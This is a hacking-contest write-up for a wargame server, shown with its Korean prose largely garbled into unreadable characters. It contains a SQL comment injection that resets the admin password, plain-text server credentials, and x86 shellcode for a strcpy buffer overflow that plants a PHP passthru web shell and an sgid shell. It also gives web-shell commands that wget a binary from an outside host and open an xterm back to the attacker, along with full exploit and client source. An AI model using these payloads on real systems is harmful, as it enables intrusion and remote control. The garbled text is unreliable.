 1ȸ  Ϳ Ŀ ŷ ȸ        < >
                                                - naska21 in WiseGuys
                                                
                                                
Gate 1.   ()                                    
                                                          
  ּ : http://211.208.185.38:8081                       
  
  Ǯ̦
  
   :  ϰ Ǯ̿   ϰڽϴ.
  
    ش  ѷ ҽϴ. α  nobody
    н带 ٲ  ִ  ־ϴ.     
    غ ؼ ĳʸ   ߽ϴ.  ĳʸ 
     ҽ ȹ ߿ ˰ Ǿϴ.
  
   nobodyн带 ٲٴ  캸, 켱 н 8ڸ
    ̻ ̾  ڰ  ߽ϴ.  н带 ٲ
     update sql ϱ     ..
    
    
    update password=$passwd where id='nobody';
    
    
     ̶ ߽ϴ.
    
    ׸  н带 ٲ   ڸ ƴ϶ '+','-'  
    ڵ       ־ϴ.    κ Ʒ 
     ּ ó  ָ,
    
    
    update password=35352354 # where id='nobody';
    
    
    nobodyӸ ƴ϶ admin н  ٲ ̶ ϰ, (
     sql ּó  κ 𸣰 ־ ׳   
    ̴ϴ) н ٲٴ Է ʵ忡
    
    
    35352354 #
    
    
    ̷ Էְ, α  ,
    
    
    i  d : admin
    pass : 35352354
    
    
     Էϴ admin α Ͽ   ϴ.
    
    
    Hi!. THis is a Gate1 Server.



    Yeah! admin!
    
    GATE1 Password-1 :  !!honda-civic-vtec-turbo!! 
    ID :  level2 
    Password :  skfdkrkwk123!! 
    
    
    IP : 211.208.185.38   SSH Port : 3322



    - level2 info -

    level2:x:503:503::/home/level2:/etc/chroot

    /home/level2/ov   (source) 
    /home/level2/shell   (source) 
    /etc/chroot   (source) 
    
    
                                                
Gate 1.   (local)                                               
                                                                        
  ּ     : 211.208.185.38                                             
  ssh port : 3322                                                       
  telnet   : 3333                                                       
    
   ȸ Ⱓ   Ʈ                                                  
                                                                        
    ۾  ʿմϴ. (  ʿ ۾    )   
                                                                        
  1. mkdir                                                              
  2. chmod                                                              
  3. write                                                              
                                                                               
     ο ϴ    ֽϴ. chroot      
   ȯ   ٸ 鵵 ֱ Դϴ.        
      ٸ   ̿         
  غñ ٶϴ.                                                    
                                                                           
  ٸ ̶, ͳݿ   ̴ Դϴ.                  
                                                                        
    ҽ  ۼ ҽ    ÷ Ͽϴ. 
  
  Ǯ̦
  
    
    [뷫  ó ]
    
     ҽ ø ƽð, ov.c  Buffer Overflow  ֽϴ.  
       ̿Ͽ 츮 츮 ڵ带   ֽϴ.
    
     chroot   Ϲ ɾ   𷺿  ִ Ÿ  
        Ƿ 16 ڵ带 ԷϱⰡ ƽϴ. (Ұ ϳ?) 
       غϱ  telnet client 䳻 16 ڵ带  Է  
      ־ մϴ.
      
     ov 츮 Ͽ  ۾ ý  Ͽ, 丮 
       Դϴ. ٷ "public_html". Ʈ ø ƽð ٸ 
      ٷ  ϴ Դϴ.  public_html ְ  ȿ 
      ý ȹϱ  php  Դϴ. ׸  php  
        ν ý ȹ,   chroot Żϰ  
      ϴ.
    
     chroot Ż , /home/mastergate1/a  crack ν Ʈ  ȣ
       ˼ ֽϴ.     root level2Ը  ֽ
      . (ý ȹ  ߰ Ͽϴ.)
    
    
    [ ]
    ذ  ڼ  ȭ մϴ.     BOF 
     ⺻  Ͽٴ Ͽ  մϴ.  ڵ常
    ְ Ͽ /ov bof ̿Ͽ ڵ带  ǹմ
    . ᱹ /ov bofϴ  Ͽϴ. ƱԸƮ ּҸ ֱ 
      κ  ؼ   ʾƵ Ǿϴ. ^^
    
     tc(ݿ ڳ Ŭ̾Ʈ) ̿Ͽ ov Buffer Overflow  ̿Ͽ
    Ʒ ڵ带  ϹǷν public_html  մϴ.
    
      : ⼭ 16 ڵ带  ؾ ϴ ڵ ֽϴ. 
             0x04, 0x0a, 0x0d ..  ̰͵ ȸϱ  ߾ .
             ׸ ڴԲ ϼ̴µ, 0xff ι  մϴ.
             ׷   0xff ڷ   ʽϴ.
             
    ҽ     ϰڽϴ.
    
    
    "\xeb\x19"                   //jmp    

    "\x5e"                       //pop    %esi
    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\x31\xc9"                   //xor    %ecx,%ecx
    "\xb0\x27"                   //mov    $0x27,%al
    "\x89\xf3"                   //mov    %esi,%ebx
    "\x66\xb9\xff\x01"           //mov    $0x1ff,%cx
    "\xcd\x80"                   //int    $0x80
    /* mkdir("public_html", 0777); */

    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\xb0\x01"                   //mov    $0x1,%al
    "\xcd\x80"                   //int    $0x80
    /* exit(0); */

    "\xe8\xe2\xff\xff\xff"       //call   
    "public_html"
   
    
     tc ̿ 16 ڵ Է> Hacker $ /ov \x41\x41\x41\x41...
    
     ڵ带 ov  ̿ ״ٸ,
    cd Ȯ ϴ. cd public_html  ѵ pwd Ͽ public_html ۾ 
    丮 Ű Ȯϸ ˴ϴ.
    
    丮   Դϴ. ڵ尡  ..
    ⼭  ڵ  ڳ ϸ ϰ ̴(?) Ư ڸ 
    մϴ.
    
    
     php ϴ.
    php ̸ wg.php,  <?passthru($a)?> Դϴ.
    Ʒ ڵ带 մϴ.
     Ҷ \xff \xff\xff, ̷ ϳ  ٿ ݴϴ.   
    \xff\xff   \xff\xff\xff\xff  ǰ?
    
    
    "\xeb\x42"                   //jmp    

    "\x5e"                       //pop    %esi
    /* str[6] => 0xff */

    "\x80\x46\x06\x01"           //addb   $0x1,0x6(%esi)
    /* str[6] => 0x00 */  <-- NULL ڸ ֱ  ߾

    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\x31\xc9"                   //xor    %ecx,%ecx
    "\x31\xd2"                   //xor    %edx,%edx
    "\xb0\x05"                   //mov    $0x5,%al
    "\x89\xf3"                   //mov    %esi,%ebx
    "\xb1\x41"                   //mov    $0x41,%cl
    "\x66\xba\xff\x01"           //mov    $0x1ff,%dx
    "\xcd\x80"                   //int    $0x80
    /* open("wg.php", O_CREAT | O_WRONLY, 0777); */

    "\xeb\x33"                   //jmp    

    "\x5e"                       //pop    %esi
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\x88\xc3"                   //mov    %al,%bl
    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xd2"                   //xor    %edx,%edx
    "\xfe\xc0"                   //inc    %al  <- 0x04 ֱ 
    "\xfe\xc0"                   //inc    %al     ߾
    "\xfe\xc0"                   //inc    %al
    "\xfe\xc0"                   //inc    %al
    "\x89\xf1"                   //mov    %esi,%ecx
    "\xb2\x12"                   //mov    $0x12,%dl
    "\x53"                       //push   %ebx
    "\xcd\x80"                   //int    $0x80
    /* write(fd, "<?passthru($a);?>", 18); */

    "\x31\xc0"                   //xor    %eax,%eax
    "\xb0\x06"                   //mov    $0x6,%al
    "\x5b"                       //pop    %ebx
    "\xcd\x80"                   //int    $0x80
    /* close(fd); */

    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\xb0\x01"                   //mov    $0x1,%al
    "\xcd\x80"                   //int    $0x80
    /* exit(0); */

    "\xe8\xb9\xff\xff\xff"       //call   
    "wg.php\xff"

    "\xe8\xc8\xff\xff\xff"       //call   
    "<?passthru($a);?>"
    
    
     ڵ带 ϱ    غҽϴ.
    
    
    http://211.208.185.38:8081/~level2/wg.php
    
    
     ȭ ȶ߸  .   ȭ  ʾҽϴ.   
    
    
    http://211.208.185.38:8081/~level2/wg.php?a=ls -al
    
    
       ּâ Է   µǾϴ.
     ý ȹϱ  Ʈ 鵵  ߽ϴٸ,   õ
     ұϰ Ʈ  ʾҽϴ. ᱹ wget xterm ̳ʸ ޾
    ͼ  ǻͿ xmanager  Ͽϴ.
    
    
    http://211.208.185.38:8081/~level2/wg.php?a=wget <http://xterm ִ ּ>
    
    http://211.208.185.38:8081/~level2/wg.php?a=chmod 777 xterm
    
    http://211.208.185.38:8081/~level2/wg.php?a=xterm -display xxx.xxx.xxx.xxx:0.0 &
    
    
    xmanager nobody  ϴ~!
    
     chroot  Ż ..  ٸ  ִ 캸ҽϴ
    /home/mastergate1 ̶   ߰ϰ,  캸ҽϴ.
    a  
    
    
    -rwxr-x---      root   level2    뷮 ¥     *a
    
    
       Ǿ ־ϴ.
     Ͽ ϱ ؼ gid level2  ʿ ߽ϴ.
    ׷  ۾..
    
    켱, /bin/sh /home/level2 մϴ.
       ϴ α׷(copy.c)  ؼ /home/level2 Ʒ Ӵϴ.
     chroot  level2  ư  ϵ   α׷
     ̿ؼ Ʊ  ξ  ٸ ̸   մϴ. ׷  
    level2 uid gid   α׷ ǰ.
    
     tc ̿ؼ ٽ ѹ ov Ͽ  level2 Ͽ sƮ
    ߰ ݴϴ. Ʒ ڵ .
    
    
    "\xeb\x19"                   //jmp

    "\x5e"                       //pop    %esi
    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\x31\xc9"                   //xor    %ecx,%ecx
    "\xb0\x0f"                   //mov    $0xf,%al
    "\x89\xf3"                   //mov    %esi,%ebx
    "\x66\xb9\xff\x01"           //mov    $0x5ff,%cx
    "\xcd\x80"                   //int    $0x80
    /* chmod("sh", 02777); */

    "\x31\xc0"                   //xor    %eax,%eax
    "\x31\xdb"                   //xor    %ebx,%ebx
    "\xb0\x01"                   //mov    $0x1,%al
    "\xcd\x80"                   //int    $0x80
    /* exit(0); */

    "\xe8\xe2\xff\xff\xff"       //call
    "sh"
    
    
    ٽ xmanager ƿͼ Ȯ ,
    sgid  sh   ֽϴ.
    
       Ű⸸ ϸ level2 sgid ˴ϴ.
    
       Ѽ level2 gid   ش  Ű ƹ 
     ʾҽϴ. ׷ gdb  غ , , ִ ڿ
      dump    gate1    ִ н ȹ   ־
    . (ð  ҽ м ϱ  ;;)

    

  ı⦢
  
  
      ߾(?) ؼ ϰ Ǿ, 
     հ еǴ ȸϴ.
    
    ƽ  ִٸ ʹ Ȳ   ,   α Ͽ
    ٴ  ʹ ƽϴ.  ʹ  α.. ;;
    
    ׸   û     Ѱ ƽ⵵ ϳ׿.. 
    
       ô е鵵 ٵ ϼ ׷  .. ^^
    
    ڵ带 ϴµ   ð  Ͽϴ.  ׸ŭ ִ
    ȸϴ.
    
    Ϳ Ŀ    ϰ ͽϴ. __
    
    
    
    Thanks to..
    
    б    п  кλ Ե, WiseGuys е,
    Null@Root е, ׸ WowHacker and etc..
    
    ڱ ̸ ȳԴٰ  ұ.. ^^;    е̶..
  
    
    
    

  ҽ
  


/* chroot.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

int b_system(const char *cmdstring)
{
pid_t pid;
int status;

if(cmdstring == NULL)
return(1);

if((pid=fork()) < 0)
{
status = -1;
} else if (pid ==0)
{
printf("%s\n", get_current_dir_name());
execl("/shell", "shell", (char *) 0);
_exit(127);
}
else {
while(waitpid(pid, &status, 0) < 0)
if(errno != EINTR) {
status=-1;
break;
}
}
return (status);

}
int main(int argc, char *argv[], char *envp[])
{
if(chdir("/home/level2"))
{ printf("chdir error"); }
if(chroot("/home/level2"))
{ printf("chroot error"); }

setgid(503);
setuid(503);
setegid(503);
seteuid(503);
setregid(503, 503);
setreuid(503, 503);
setfsgid(503);
setfsuid(503);


printf("Start Shell\n");
b_system("/shell");
}




/* shell.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>

int b_system(const char *cmdstring)
{
pid_t pid;
int status;
char *one, *two, *three, *four, *five, *cmds;

cmds=(char *)strtok(cmdstring, " ");
one=(char *)strtok(NULL, " ");
two=(char *)strtok(NULL, " ");
three=(char *)strtok(NULL, " ");
four=(char *)strtok(NULL, " ");
five=(char *)strtok(NULL, " ");

if(cmdstring == NULL)
return(1);

if((pid=fork()) < 0)
{
status = -1;
} else if (pid ==0)
{
execlp(cmds, cmds, one, two, three, four, five, 0);
_exit(127);
}
else {
while(waitpid(pid, &status, 0) < 0)
if(errno != EINTR) {
status=-1;
break;
}
}
return (status);

}

int main(int argc, char *argv[])
{
char cmd[1000]={0};
char realcmd[1000]={0};
char imsicmd[1000]={0};
char *move_dir;
char *one, *two, *three, *four;

int fork1=0, fork2=0;

printf("Hacker$ ");
for(;;)
{
  memset(cmd, 0, 1000);
  memset(imsicmd, 0, 1000);
  memset(realcmd, 0, 1000);
  fgets(cmd, 1000, stdin);
  strcpy(imsicmd, cmd);

  strtok(imsicmd, "\n ");

  if(!strcmp(imsicmd, "exit"))
  {
   return 0;
  }
  else if(!strcmp(imsicmd, "pwd"))
  {
   printf("%s\n", get_current_dir_name());
  }
  else if(!strcmp(imsicmd, "cd"))
  {
   strtok(cmd, " ");
   move_dir=(char *)strtok(NULL, "\n");
   if(chdir(move_dir))
   {
    printf("%s 丮 ̵ \n", move_dir);
   }
  }
  else if(imsicmd[0]=='\n')
  {
  }
  else
  {
   strtok(cmd, " ");
   one=(char *)strtok(NULL, " ");
   two=(char *)strtok(NULL, " ");
   three=(char *)strtok(NULL, " ");
   four=(char *)strtok(NULL, " ");

   sprintf(realcmd, "%s %s %s", cmd, one, two, three, four);
   strtok(realcmd, "\n");
   b_system(realcmd);
  }
  printf("Hacker$ ");
}
}



/* ov.c */

#include <stdio.h>
#include <stdlib.h>

void function(char *str)
{
char buf[4];
strcpy(buf, str);
}

int main(int argc, char *argv[])
{
if(argc < 2)
{
  printf("using argv\n");
  return 0;
}

printf("argv[1] = %p\n", argv[1]); 
function(argv[1]);
}



/* tc.c (ݿ ڳ Ŭ̾Ʈ) */ 

#include <stdio.h> 
#include <unistd.h> 
#include <signal.h> 
#include <netdb.h> 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 

void change(char*); 

int main( int argc, char *argv[] ) { 

                char spy[2000]; 
                char tmp[1000]; 
                char tmp2[1000]; 
                char tmp3[1024]; 
                int a,b,c; 

                int sockfd, numbytes; 
                struct hostent *he; 
                struct sockaddr_in their_addr; 





        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { 
                perror("socket"); 
                exit(1); 
        } 

        their_addr.sin_family = AF_INET; 
        their_addr.sin_port = htons(3333); 
        their_addr.sin_addr.s_addr = inet_addr("211.208.185.38"); 
        bzero(&(their_addr.sin_zero), 8); 

        if (connect(sockfd, (struct sockaddr *)&their_addr, 
                sizeof(struct sockaddr)) == -1) { 
                perror("connect"); 
                exit(1); 
        } 

/*ڳ  (?) ó κ******************************************************/ 

        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        send(sockfd, "\xff\xfb\x18", 3, 0); 
        send(sockfd, "\xff\xfc\x20\xff\xfc\x23\xff\xfc\x27", 9, 0); 
        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        send(sockfd, "\xff\xfa\x18\x00\x76\x74\x31\x30\x30\xff\xf0", 11, 0); 
        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        send(sockfd, "\xff\xfd\x08", 3, 0); 
        send(sockfd, "\xff\xfc\x01\xff\xfb\x1f\xff\xfa\x1f\x00\x50\x00\x18\xff\xf0\xff\xfe\x05\xff\xfb\x21", 21, 0); 

        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        recv( sockfd , tmp2 , sizeof(tmp2), 0); 

        send(sockfd, "level2\n", 6, 0); 
        send(sockfd, "\x0D", 1, 0); 

        recv( sockfd , tmp2 , sizeof(tmp2), 0); 
        recv( sockfd , tmp2 , sizeof(tmp2), 0); 

        send(sockfd, "skfdkrkwk123!!\n", 14, 0); 
        send(sockfd, "\x0D", 1, 0); 

        recv( sockfd , tmp2 , sizeof(tmp2), 0); 

        printf("%s", tmp2); 

/**************************************************************************/ 

        while(a!=-1 && b!=-1 ){ 
                bzero(tmp3,1000); 
                fgets(tmp3, sizeof(tmp3), stdin); 
                 
                                change(tmp3); 
                //strcpy(tmp3, change(tmp3)); 

                a = send(sockfd, tmp3, strlen(tmp3), 0); 
                bzero(tmp2,1000); 
                b = recv( sockfd , tmp2 , sizeof(tmp2), 0); 

                printf("%s ", tmp2); 
        } 



} 

void change(char* str){ 

        char whole[1000]; 
        char ch[500]; 
        char *tmp; 
        char itmp[5]; 
        int count = 0; 
        int count2 = 0; 
        int i; 

        strcpy(whole, str); 

        tmp = (char*)strtok(whole, "\\"); 
        do{ 
                if(*tmp == 'x'){ 
                    itmp[0] = '0'; 
                    itmp[1] = 'x'; 
                    itmp[2] = *(tmp+1); 
                    itmp[3] = *(tmp+2); 
                    itmp[4] = '\x0'; 
                    ch[count++] = (char)strtol(itmp, 0, 16); 
                } 
        }while(tmp = (char*)strtok(NULL, "\\")); 

        for(i = 0,count = 0; i < strlen(str); i++){ 
            switch(str[i]){ 
            case '\\': 
                if(str[i+1] == 'x'){ 
                    i+=3; 
                    str[count++] = ch[count2++]; 
                } 
                else{ 
                    str[count++] = str[i]; 
                } 

                break; 
            default: 
                str[count++] = str[i]; 
            } 
        } 
        str[count] = '\0'; 

} 




/* copy.c */

#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char* argv[])
{
    char c; 
    int in, out;

    in = open(argv[1], O_RDONLY); 
    out = open(argv[2], O_WRONLY|O_CREAT, S_IRUSR|S_IWUSR);
    while(read(in,&c,1) == 1)
        write(out,&c,1);

    exit(0);
}

